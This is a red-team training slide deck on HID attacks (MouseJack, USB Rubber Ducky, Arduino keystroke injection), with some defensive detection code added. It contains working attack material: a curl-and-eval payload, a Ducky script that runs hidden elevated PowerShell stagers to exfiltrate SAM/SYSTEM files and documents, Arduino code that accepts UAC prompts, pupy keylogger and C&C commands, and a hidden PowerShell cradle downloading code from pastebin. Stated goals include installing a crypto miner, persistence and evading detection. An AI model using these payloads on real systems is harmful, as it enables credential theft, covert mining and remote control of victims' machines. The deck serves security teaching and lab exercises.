Red Team Practical Attacks

S01E01

HID attacks - SE techniques

Giacomo Pezzi

Edoardo Rosa

The Red Team

In military jargon, the term Red Team is traditionally used to identify highly skilled and organized groups acting as fictitious rivals and/or enemies to the “regular” forces, the Blue Team.

The beginning

Historically, a red team was a group of military personnel playing the role of adversaries, the enemy or opposing force (“RED”), as opposed to the friendly forces team (“BLUE”). With time, the red team's mission and capabilities evolved and it turned into a force tasked with challenging the security posture of military bases, outposts and other “targets”.

The 80s/90s

Corporations in general and high-tech companies in particular sought a way to test their security posture and see whether they were vulnerable to attacks they hadn't accounted or planned for. The early civilian red teams were mostly information/computer security professionals mixed with physical security experts, and they were mainly focused on what was possible with the technology of the day.

Today

Today both government and private organizations use Red Teams not only to test the current state of their physical and digital security but also to continuously challenge the plans, defensive measures and security concepts/policies.

These exercises result in a better understanding of possible adversaries and help to improve countermeasures against them and future threats.

Red

  • explore any possible way to plan and carry out an attack with the attitude of potential assailants
  • identify any vulnerability in the PPT (People, Process and Technology) defensive system
  • think outside the box

Blue

  • incident response
  • mitigation
  • log analysis / sys monitoring
  • the masters of SOC


The Vicious Circle

Both teams help the organization improve its own defensive abilities -> interaction and mutual feedback

...on both sides, human intuition, expertise and cleverness cannot be replaced! So:

Italian Blue Team Example:

Physical Penetration Testing

If you know the enemy and know yourself, you need not fear the result of a hundred battles.


Sun Tzu: The Art of War

I am totally secure!

You can have the best firewalls and change control procedures; you can have regular electronic penetration testing against networks and applications; you can audit your source code and lock down your servers. All of these approaches are fine and, if conducted well, are generally worthwhile. However, if an attacker can physically penetrate your premises and access information systems directly, these strategies won’t protect you.

Defence POV

Technologies that are commonly deployed to keep intruders out:

  • badges and access tokens
  • guards
  • cameras
  • physical access controls
  • ...

Attack POV

Techniques that are commonly used by an attacker / physical pentester:

  • Break-In
  • HID Attacks
  • Social Engineering
  • ...

The Physical Aspect

Lockpicking

The art of unlocking a lock by manipulating the components of the lock device without the original key.

Irruption

  • no code
  • no CVE
  • no framework
  • no buffer overflow
  • no asm
  • no ebuild


only tricks!

RFID

Radio-frequency identification uses electromagnetic fields to automatically identify and track tags attached to objects.

Main frequencies:

- 125 KHz

- 13 MHz

RFID Attacks

4,50 € - read 125 KHz

6,50 € - read 13 MHz

12 € - clone 125 KHz

HID

Attacks

Against (!)Humans

A human interface device (HID) is a type of computer device that takes input from humans and gives output to humans.

The term "HID" most commonly refers to the USB-HID specification.

  • Keyboard, Mouse, Game Controllers, Drawing tablets, etc.
  • most of the time they don't need external drivers to operate
  • outside the scope of antivirus software

The Attack

An HID attack could lead to payload delivery or data exfiltration simply by using a pre-programmed USB stick that acts as an HID device: for example, a specialized tool to SPOOF keyboard input.

By default, operating systems tend to allow keyboards and mouse full control of the system. Using timed commands, it is easy to run a complete drive-by HID attack in 20 seconds, possibly even less. It also avoids detection in some ways as you are ‘physically pressing the keys’ – or at least, that’s what the computer thinks.

Most antivirus software will not protect you against this kind of an attack.

From the OS's point of view, the user is typing on their keyboard!!
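A defender-side illustration of the "timed commands" point above, added here as an example and not part of the original slides: a host agent that records keystroke timestamps can flag a run of keys that arrives faster than any person can type, which is exactly what a scripted HID device produces. The event list, the window size and the timing thresholds below are constructed assumptions, not measurements.

```python
"""Keystroke-timing heuristic for spotting injected input.

Added example for these slides, not the authors' code. It reasons over a
constructed list of keystroke events (timestamp_ms, key) of the kind a host
agent could record; the human-typing thresholds are assumptions, not
measurements, and the sample events below are constructed.
"""


def make_sample_events():
    """Constructed sample: a person typing a short command at ~120 ms per key,
    a pause, then a scripted burst arriving at 4 ms per key."""
    events, t = [], 0
    for key in "ls -la":
        t += 120
        events.append((t, key))
    t += 3000
    for key in "powershell -w h -c <payload>" * 3:
        t += 4
        events.append((t, key))
    return events


def inter_key_intervals(events):
    """Milliseconds between consecutive keystrokes (interval i sits between
    events i and i+1)."""
    return [later[0] - earlier[0] for earlier, later in zip(events, events[1:])]


def detect_injection(events, window=10, max_ms=20, min_fraction=0.9):
    """Return (first_event, last_event) index pairs for runs of keystrokes
    that arrive faster than a person can type.

    A run starts when at least `min_fraction` of `window` consecutive
    intervals are <= max_ms (tolerates a little jitter) and the first of them
    is fast; it then extends while intervals stay fast."""
    intervals = inter_key_intervals(events)
    spans, i = [], 0
    while i + window <= len(intervals):
        chunk = intervals[i:i + window]
        fast = sum(1 for d in chunk if d <= max_ms)
        if chunk[0] <= max_ms and fast / window >= min_fraction:
            j = i + window
            while j < len(intervals) and intervals[j] <= max_ms:
                j += 1
            spans.append((i, j))
            i = j
        else:
            i += 1
    return spans


def injected_text(events, span):
    """Reconstruct what the suspicious run typed, for the analyst's report."""
    first, last = span
    return "".join(key for _, key in events[first:last + 1])


if __name__ == "__main__":
    sample = make_sample_events()
    for span in detect_injection(sample):
        print(f"keystroke burst at events {span}: {injected_text(sample, span)!r}")
```

The check is deliberately per-run rather than per-key: a single fast interval happens when two keys roll, a sustained run of them does not. Pairing it with the time since the last keyboard was enumerated (a device that starts typing within seconds of attaching) narrows it further.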

MouseJack

Vulnerabilities affecting non-Bluetooth wireless mice and keyboards, discovered by Marc Newlin of the Bastille Threat Research Team.


https://www.bastille.net/

https://www.mousejack.com/


These vulnerabilities enable an attacker to type arbitrary commands into a victim's machine using a USB dongle.

MouseJack - Why

Wireless mice and keyboards communicate using proprietary protocols operating in the 2.4 GHz ISM band (Industrial, Scientific, Medical):

there is no standard to follow

Each vendor can implement its own security scheme.

MouseJack - Why

Researchers discovered that some dongles don't implement encryption at all, or that their encryption is flawed, and that dongles can also process specially crafted packets which generate keypresses instead of mouse movements/clicks.

- keystroke injection, spoofing a mouse

- keystroke injection, spoofing a keyboard

- forced pair

MouseJack - How

CrazyRadio PA by Bitcraze is an open-source, amplified nRF24L-based USB dongle: equivalent to an amplified version of the common USB dongle for mice and keyboards.

- pseudo-promiscuous mode
- packet sniffing
- packet injection
- easy interface

30 € on Amazon......

MouseJack - Tools

MouseJack - Example

- choose a victim with a possibly unpatched/vulnerable device

MouseJack - Example

- gather information about OS, keybindings, installed tools, etc.

Ty github... <3

MouseJack - Example

- write exploit

DELAY 1000
GUI-SHIFT ENTER
DELAY 600
STRING (x=$(\curl -sL https://bit.ly/2yOCGw8);eval $x)&;disown %1;exit
ENTER

USB Rubber Ducky

- Data Exfiltration -

Specs

The USB Rubber Ducky is a keystroke injection tool disguised as a generic flash drive. When it is plugged into a computer, it instead registers itself as a USB keyboard on the system and fires off a keystroke payload at lightning speed.

Pros

  • simple scripting language
  • covert design
  • multiplatform
  • TwinDuck firmware
  • multipayload (caps-ins-num)
  • changeable VID/PID

Cons

  • expensive (~$50)
  • not always reliable
  • old..

Ducky Script - Simple!

Payloads are crafted using a simple scripting language and can be used to drop reverse shells, inject binaries, brute force pin codes, and many other automated functions for the penetration tester and systems administrator. Writing scripts can be done from any common text editor.


Ducky Script - Syntax pills (1)

Command    Parameters
REM        - (comment line, no parameters)
DELAY      0.. (milliseconds)
STRING     a...z A...Z 0..9 !...) `~ += _- "' :; <, >. ?/ \ and pipe
REPEAT     (n) number of times to repeat the previous command
(*)ARROW   left, right, up or down arrow

Ducky Script - Syntax pills (2)

Command    Optional Parameters
GUI        Single char
SHIFT      DELETE, HOME, INSERT, PAGEUP, PAGEDOWN, WINDOWS, GUI, UPARROW, DOWNARROW, LEFTARROW, RIGHTARROW, TAB
ALT        END, ESC, ESCAPE, F1...F12, Single Char, SPACE, TAB
CTRL       BREAK, PAUSE, F1...F12, ESCAPE, ESC, Single Char

See more on: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript
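The two syntax tables above are enough to write a small static analyzer for Ducky Script, which is what an analyst wants when the source of an inject.bin turns up during an investigation. This is an added example, not the authors' code and not the duckencoder tool; it handles the commands the slides list (REM, DELAY, STRING, REPEAT, ENTER, modifier combos and arrow keys), expands REPEAT, reports unknown commands and estimates how long the payload keeps the keyboard busy. DELAY is in milliseconds; the per-character and per-key costs and the sample script are assumptions of this example.

```python
"""Static analyzer for Ducky Script.

Added example for these slides; it is neither the authors' code nor the
duckencoder tool. It parses the command set listed on the slides (REM, DELAY,
STRING, REPEAT, ENTER, GUI/SHIFT/ALT/CTRL combos, arrow keys), expands REPEAT,
reports unknown commands and estimates runtime. DELAY is in milliseconds; the
per-character and per-key costs are assumptions, not measured Ducky timings.
"""

MODIFIERS = {"GUI", "WINDOWS", "SHIFT", "ALT", "CTRL", "CONTROL"}
ARROWS = {"LEFTARROW", "RIGHTARROW", "UPARROW", "DOWNARROW",
          "LEFT", "RIGHT", "UP", "DOWN"}
SPECIAL = {"ENTER", "DELETE", "HOME", "INSERT", "PAGEUP", "PAGEDOWN", "TAB",
           "END", "ESC", "ESCAPE", "SPACE", "BREAK", "PAUSE", "CAPSLOCK"}
SPECIAL |= {f"F{n}" for n in range(1, 13)}

# Constructed sample script (not one of the slides' payloads); line 12 is
# deliberately invalid to show error reporting.
SAMPLE_SCRIPT = """\
REM constructed sample, not a real payload
DELAY 1000
GUI r
DELAY 200
STRING notepad
ENTER
DELAY 500
STRING hello
REPEAT 2
LEFTARROW
CTRL-ALT DELETE
WAIT 100
"""


def parse_key(cmd, arg):
    """Normalize a key line ('GUI r', 'GUI-SHIFT ENTER', 'LEFTARROW') to a
    'MOD+MOD+KEY' string, or return None if it is not a valid key line."""
    mods = cmd.split("-")
    if all(m in MODIFIERS for m in mods):
        if arg == "":
            return "+".join(mods)
        if len(arg) == 1:
            return "+".join(mods + [arg])
        if arg.upper() in SPECIAL | ARROWS:
            return "+".join(mods + [arg.upper()])
        return None
    if arg == "" and cmd in SPECIAL | ARROWS:
        return cmd
    return None


def parse_ducky(script):
    """Return (commands, errors). Each command is ('delay', ms),
    ('string', text) or ('key', combo); REPEAT n re-appends the previous
    command n times, as the Ducky does."""
    commands, errors = [], []
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        cmd, arg = cmd.upper(), rest.strip()
        if cmd == "REM":
            continue
        if cmd == "DELAY":
            if arg.isdigit():
                commands.append(("delay", int(arg)))
            else:
                errors.append(f"line {lineno}: DELAY needs a non-negative integer")
        elif cmd == "STRING":
            commands.append(("string", rest))
        elif cmd == "REPEAT":
            if not commands:
                errors.append(f"line {lineno}: REPEAT has nothing to repeat")
            elif not arg.isdigit():
                errors.append(f"line {lineno}: REPEAT needs an integer count")
            else:
                commands.extend([commands[-1]] * int(arg))
        else:
            combo = parse_key(cmd, arg)
            if combo is None:
                errors.append(f"line {lineno}: unknown command {line!r}")
            else:
                commands.append(("key", combo))
    return commands, errors


def typed_text(commands):
    """Everything the script would type, concatenated."""
    return "".join(v for kind, v in commands if kind == "string")


def key_sequence(commands):
    """The key combos in order, e.g. ['GUI+r', 'ENTER']."""
    return [v for kind, v in commands if kind == "key"]


def estimate_ms(commands, char_ms=10, key_ms=10):
    """Wall-clock estimate: explicit delays plus an assumed cost per typed
    character and per key combo (both assumptions of this example)."""
    total = 0
    for kind, value in commands:
        if kind == "delay":
            total += value
        elif kind == "string":
            total += len(value) * char_ms
        else:
            total += key_ms
    return total


if __name__ == "__main__":
    cmds, errs = parse_ducky(SAMPLE_SCRIPT)
    print("types:", typed_text(cmds))
    print("keys:", key_sequence(cmds))
    print("estimated runtime: %d ms" % estimate_ms(cmds))
    for e in errs:
        print("error:", e)
```

The runtime estimate is the number that matters on the defensive side: it bounds how short an unattended window is enough, which is the argument for auto-lock timeouts measured in seconds rather than minutes.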

Ducky Script - Compiling

Ducky Scripts are compiled into hex files ready to be named inject.bin and moved to the root of a microSD card for execution by the USB Rubber Ducky. This is done with the tool duckencoder.

Best experience: https://github.com/kevthehermit/DuckToolkit

Best automation: https://ducktoolkit.com/

Attacker

USB Rubber Ducky

  • TwinDuck firmware
  • microSD 8GB
  • generic 'Flash Drive' VID/PID

Victim

Windows 10 64-bit

  • locale & keyboard: ITA
  • Avira AV free on top
  • Windows Defender up
  • Windows Firewall up
  • User away for 2 minutes

Exfiltration & information gathering:

  • steal valuable information (shares, file tree, installed software, passwords)
  • steal SAM/SYSTEM files (-> samdump2, john)
  • steal various documents
  • as fast as possible!!!

Goals

Execution - Keystroke Injection

DELAY 4000
GUI r
DELAY 100
STRING powershell -command "Start-Process powershell -Verb runAs -ArgumentList '-w h -c  .(((Get-Volume -FileSystemLabel DUCKY).DriveLetter)+'':\d.cmd'') ' "
DELAY 100
ENTER
DELAY 1100
LEFTARROW
DELAY 50
ENTER

Execution - Features (1)

Multi-stager payload -> CAPSLOCK blinking every stage:

"$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

Hidden execution:

d.cmd (executed by keystroke) will invisibly execute e.cmd using i.vbs

Execution - Features (2)

Multi-feature stager:

e.cmd (executed by d.cmd) will execute p.ps1 -> reporting + SAM/SYSTEM exfiltration

and then performs pure data exfiltration -> steals files placed in %USERPROFILE%\Documents until the Ducky is unplugged by the attacker

Execution - Features (3)

Believability inside:


Looks like a generic flash drive -> TwinDuck firmware


Emulation of the most common USB flash drive chipsets: Alcor Micro Corp's (0x058F) generic 'Flash Drive' (0x6387) -> vidpid.bin on microSD root, optionally hidden


Choose a story for your drive -> NO LIMITS!!!
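The VID/PID story above works because a host trusts whatever the device descriptor says. An added example (not the slides' code) of the check a defender can run over enumerated USB devices: flag any keyboard interface whose identity is not on the organization's keyboard allowlist, and any device that exposes both a keyboard and a mass-storage interface, which is the TwinDuck shape. The device records and the allowlist are constructed; the fields mirror what Linux exposes in sysfs as idVendor, idProduct and bInterfaceClass/SubClass/Protocol, and the only identifier taken from the slide is the Alcor Micro 058f:6387 flash-drive pair.

```python
"""Audit of enumerated USB devices for keyboard-shaped surprises.

Added example for these slides, not the authors' code. Device records are
constructed; an agent would fill them from sysfs (idVendor, idProduct,
bInterfaceClass/SubClass/Protocol). The keyboard allowlist is a placeholder
an organization fills from its own hardware inventory.
"""

HID_CLASS, MASS_STORAGE_CLASS = 0x03, 0x08
HID_PROTO_KEYBOARD = 0x01  # bInterfaceProtocol for boot-protocol keyboards

# Placeholder allowlist: (idVendor, idProduct) of keyboards the organization
# actually issues. Constructed values, not real inventory.
KEYBOARD_ALLOWLIST = {(0x1234, 0x0001)}

# Constructed sample enumeration, one dict per device.
SAMPLE_DEVICES = [
    {"id": "usb1-1", "vid": 0x1234, "pid": 0x0001, "product": "Corporate Keyboard",
     "interfaces": [(HID_CLASS, 0x01, HID_PROTO_KEYBOARD)]},
    # Plain flash drive: SCSI-transparent subclass, bulk-only protocol
    {"id": "usb1-2", "vid": 0x058F, "pid": 0x6387, "product": "Flash Drive",
     "interfaces": [(MASS_STORAGE_CLASS, 0x06, 0x50)]},
    # Same flash-drive identity, but it also enumerates a keyboard interface
    {"id": "usb1-3", "vid": 0x058F, "pid": 0x6387, "product": "Flash Drive",
     "interfaces": [(MASS_STORAGE_CLASS, 0x06, 0x50),
                    (HID_CLASS, 0x01, HID_PROTO_KEYBOARD)]},
]


def is_keyboard(iface):
    cls, _subclass, proto = iface
    return cls == HID_CLASS and proto == HID_PROTO_KEYBOARD


def audit_usb(devices, allowlist=KEYBOARD_ALLOWLIST):
    """Return (device id, reason) alerts for devices that present a keyboard
    interface from an unknown identity or alongside mass storage."""
    alerts = []
    for dev in devices:
        has_keyboard = any(is_keyboard(i) for i in dev["interfaces"])
        has_storage = any(i[0] == MASS_STORAGE_CLASS for i in dev["interfaces"])
        identity = (dev["vid"], dev["pid"])
        if has_keyboard and identity not in allowlist:
            alerts.append((dev["id"],
                           "keyboard interface from non-allowlisted identity %04x:%04x" % identity))
        if has_keyboard and has_storage:
            alerts.append((dev["id"], "keyboard and mass-storage interfaces on one device"))
    return alerts


if __name__ == "__main__":
    for dev_id, reason in audit_usb(SAMPLE_DEVICES):
        print(f"{dev_id}: {reason}")
```

The interface descriptors are the part a spoofed VID/PID cannot hide: to type, the device must enumerate a HID keyboard interface, whatever vendor name it claims. Tools such as USBGuard apply this kind of rule at attach time rather than after the fact.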

Demo

Arduino

- Fun&Profit -

Hardware - Arduino Micro

Arduino Micro is a small board that is easy to integrate into everyday objects to make them interactive.

The Micro is based on the ATmega32U4 microcontroller featuring built-in USB, which lets the Micro present itself as a mouse or keyboard.

Pros

  • cheap (18 €)
  • hackable
  • Mouse and Keyboard lib
  • general purpose
  • tons of lib
  • open
  • https://nurrl.github.io/Duckuino/

Cons

  • need soldering
  • Arduino language
  • ugly af
  • no storage

Example

#include "Keyboard.h"

void setup() {
  Keyboard.begin();
  delay(6000);               // wait for the host to enumerate the keyboard
  run_powershell_admin();
  payload(String("ciao"));
  Keyboard.end();
}

void run_powershell_admin() {
  // Win key opens the Start menu search, then type the program name
  Keyboard.press(KEY_LEFT_GUI);
  delay(300);
  Keyboard.releaseAll();
  Keyboard.println("notepad");
  delay(500);
  // Ctrl+Shift+Enter launches the highlighted entry as Administrator
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  delay(800);
  bypass_uac();
}

void bypass_uac() {
  // on the UAC prompt, move the selection left and confirm
  Keyboard.press(KEY_LEFT_ARROW);
  Keyboard.release(KEY_LEFT_ARROW);
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(800);
}

void payload(String str) {
  Keyboard.println(str);
  delay(400);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
}

void loop() { }

Goals

  • download XMRig
  • execute XMRig
  • connect to C&C
  • add persistence
  • block threat intel
  • avoid detection

Execution

Arduino can only inject keystrokes: no drive storage!!!!

Download the payload from a known and controlled source: pastebin.com

Disable Firewall to access XMR pool and C&C server

How to start the download?

Run as Administrator

Execution - Connection to C&C

https://github.com/n1nj4sec/pupy

Setup Server:

./pupysh.py -p 4444 -t http

Generate Client Payload:

./pupygen.py -s keylogger -f ps1 -O windows connect --host 192.168.1.111:4444 -t http

Upload to pastebin:

https://pastebin.com/YaUXbj3W

Use inside main script:

IEX ((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/YaUXbj3W'))

Execution

String hejo = String("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX ((New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/KRQFLR83'));\";exit");
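The command line above is what lands in process-creation telemetry on the victim, so that is where a defender looks for it. An added example (not the authors' code) that scores constructed process-creation log lines for the cradle's indicators: the no-profile, non-interactive, hidden-window and execution-policy-bypass switches, IEX, WebClient/DownloadString and a pastebin raw URL. The log layout, indicator set, alert threshold and the placeholder paste ID are assumptions of this example; a real source would be Windows event 4688 or Sysmon event 1 with the command-line field.

```python
"""Scoring PowerShell command lines for download-and-execute cradles.

Added example for these slides, not the authors' code. Log lines are
constructed in a simple key=value layout; the paste URL is a placeholder,
not the one on the slides. Indicator names, the one-point-each weighting and
the alert threshold are assumptions of this example.
"""
import re

INDICATORS = {
    "no_profile":        r"-no?p(rofile)?\b",
    "non_interactive":   r"-noni(nteractive)?\b",
    "hidden_window":     r"-w(indowstyle)?\s+h(idden)?\b",
    "exec_bypass":       r"-e(xec|p|xecutionpolicy)?\s+bypass\b",
    "invoke_expression": r"\b(iex|invoke-expression)\b",
    "download_cradle":   r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest)",
    "paste_site":        r"pastebin\.com/raw",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in INDICATORS.items()}
ALERT_THRESHOLD = 3

# Constructed process-creation records: the cradle, a benign interactive
# command, and an admin script that only uses a hidden window.
SAMPLE_LOG = [
    "ts=2019-03-01T10:02:11 host=WS01 user=alice parent=explorer.exe cmdline="
    "powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX ((New-Object Net.WebClient)"
    ".DownloadString('http://pastebin.com/raw/PLACEHOLDER-ID'))\";exit",
    "ts=2019-03-01T10:05:40 host=WS01 user=alice parent=explorer.exe cmdline="
    "powershell -Command Get-Process | Sort-Object CPU",
    r"ts=2019-03-01T10:07:02 host=WS02 user=bob parent=taskeng.exe cmdline="
    r"powershell -W Hidden -File C:\Scripts\backup.ps1",
]


def parse_line(line):
    """Split a key=value record; cmdline is last and may contain spaces."""
    head, _, cmdline = line.partition(" cmdline=")
    fields = dict(kv.split("=", 1) for kv in head.split())
    fields["cmdline"] = cmdline
    return fields


def score_cmdline(cmdline):
    """Return (score, sorted indicator names) for one command line."""
    hits = sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))
    return len(hits), hits


def scan(lines, threshold=ALERT_THRESHOLD):
    """Return (host, user, score, indicators) for records at or above the threshold."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        score, hits = score_cmdline(rec["cmdline"])
        if score >= threshold:
            alerts.append((rec["host"], rec["user"], score, hits))
    return alerts


if __name__ == "__main__":
    for host, user, score, hits in scan(SAMPLE_LOG):
        print(f"{host}/{user}: score {score} -> {', '.join(hits)}")
```

The threshold is what keeps the hidden-window backup script out of the alert queue: any single switch has legitimate uses, while the combination of hidden window, policy bypass and a remote code fetch almost never does. Parent process is the other signal worth keeping in the record: a cradle spawned by explorer.exe within seconds of a new keyboard attaching is the HID case specifically.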

Powershell payload:

Run a PowerShell console as Administrator:

void run_powershell_admin() {
  // Win+x opens the power-user menu ('x' is ASCII 120)
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press(char(120));
  delay(300);
  Keyboard.releaseAll();
  // 'a' (ASCII 97) picks the "Windows PowerShell (Admin)" entry
  Keyboard.press(char(97));
  delay(800);
  bypass_uac();
}

Execution Time:

11 s

Demo

Lab

Choose your Weapon

Rules Of Engagement

  • Target: Windows 10 64-bit ITA - VM
  • you have to find the flag: hejo{...}
  • Avira AV free
  • Windows Firewall on
  • Windows Defender on
  • away about 1 minute on coffee break (surreal)
  • huge mr. robot fan (so the attacker)
  • strange intercom photos collector (weirdo)

Specs

The Target

Have Fun!

RTFM

By Edoardo Rosa
